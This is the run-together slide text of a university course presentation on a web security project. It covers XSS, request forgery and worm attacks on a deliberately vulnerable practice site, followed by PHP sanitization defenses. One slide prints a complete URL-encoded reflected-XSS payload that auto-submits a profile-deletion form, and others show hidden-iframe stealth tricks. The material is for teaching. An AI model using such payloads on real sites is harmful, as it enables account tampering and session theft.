Project 2: Web App SecurityPart 1OverviewAttacksSanitizationExample: Profile DeleterFind vulnerabilityCopy form dataURL encodeDebuggingFixed versionFinal TestStealthier approachesPart 2GoalsFile structuretxt-db-apiDefenses to Part 1PHP Sanitization TechniquesMore XSS huntingGood luck!1Project 2: Web App SecurityCollin JacksonCS 155Spring 20072Part 1Attacks3Overview•Explore severalattack types•Requires botheffectiveness and stealth•Learn:•How an attacker can evade sanitization•Consequences of an exploit•JavaScript•Very basic CSS4A: Cookie TheftUse URL encodingCould hijack sessionC: Password TheftEvade sanitizationHandle DOM eventsemailAttacks B: Request ForgeryNavigate browserUse iframes, formsD: Profile WormPersistent attackReplicateszoobar.orglinkemailzoobar.orgformbadguy.comstanford.eduredirectbadguy.comzoobar.orgformzoobar.org5SanitizationWorks differently depending on context<tag property=" attackstring ">Attack: Break out with ' "Defense: escape quotes with \<body> attackstring </body>Attack: Launch script with < >Attack: Close off parent tag </tag>Defense: escape angle bracketseval( attackstring )Attack: Do whatever you wantDefense: Don’t do that6Example: Profile DeleterMalicious hyperlink deletes profile of user who clicks itOnly works when user logged inUser might have multiple tabs openMight have chosen/forgotten not to log outMight appear in another user’s profileUses vulnerability in users.php from Attack AConstructs profile deletion form and submits it???7Find vulnerabilitySite reflectsquery parameter in input fieldLink can includeanything wewant here8Copy form dataView sourceto find formfieldsCreate copycat form with ourmodifications9Close previous<input>,<form>Buttonclick triggersform submitURL encodehttp://scriptasylum.com/tutorials/encdec/encode-decode.htmlhttp://www.dommermuth-1.com/protosite/experiments/encode/index.html10DebuggingCheck errorIt didn’t work.Open JavaScriptconsoleUndefined No properties!Two formswith same name11Now withcorrectformFixed version12Profile deletedFinal Testusers.phpreplacedwith index.phphttp://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E13Post form into hidden iframe <form name=F action=/index.php target=myframe>…<iframe name=myframe style=“visibility:hidden”>…Open page with form in hidden iframe<iframe name=myframe style=“visibility:hidden”>…<script>document.myframe.contentDocument.forms[0] .profile_update.value =“”;</script>Stealthier approaches14Part 2Defenses15Goals•Learn:•How easy it is to make mistakes•That even simple code can be hard to secure•Techniques for appropriate input validation•PHP•Very basic SQLLittle programming knowledge can be a dangerous thing16File structureindex.php users.phptransfer.phplogin.phpincludes/auth.php (cookie authentication)common.php (includes everything else)navigation.php (site template)db/zoobar/Person.txt (must be writable by web server)Includes /usr/class/cs155/projects/pp2/txt-db-api/…Only edit these files17txt-db-apiThird-party text file database libraryData can be int, string, and autoincrementNeed to escape strings: \' \" \\Actually magic_quotes_gpc does this for us$recipient = $_POST[‘recipient’]; // already escaped$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql);if( $rs->next() )$id = $rs->getCurrentValueByName(‘PersonID’);18A: Cookie TheftC: Password TheftDefenses to Part 1 B: Request ForgeryAttack D: Profile Worm19PHP Sanitization Techniquesaddslashes(string)Prepends backslash to ' " \ Already done by magic_quotes_gpcInverse: stripslashes(string)htmlspecialc ha rs(string [, quote_style])Converts & < > " to HTML entitiesUse ENT_QUOTES to change ' to ' strip_tags (string, [, allowable_tags])Max tag length 1024Does not sanitize tag propertiespreg_replace(pattern, replacement, subject)More info: http://php.net20More XSS huntingLook for untrusted input used as outputNote sanitization already applied to each variableForm data has magic_quotes_gpc, db data does notSanitize the output if necessaryNo penalty for erring on the side of cautionBut sanitizing multiple times may lead to problemsNo credit for solving non-goals: SQL injection, etc.21Good
View Full Document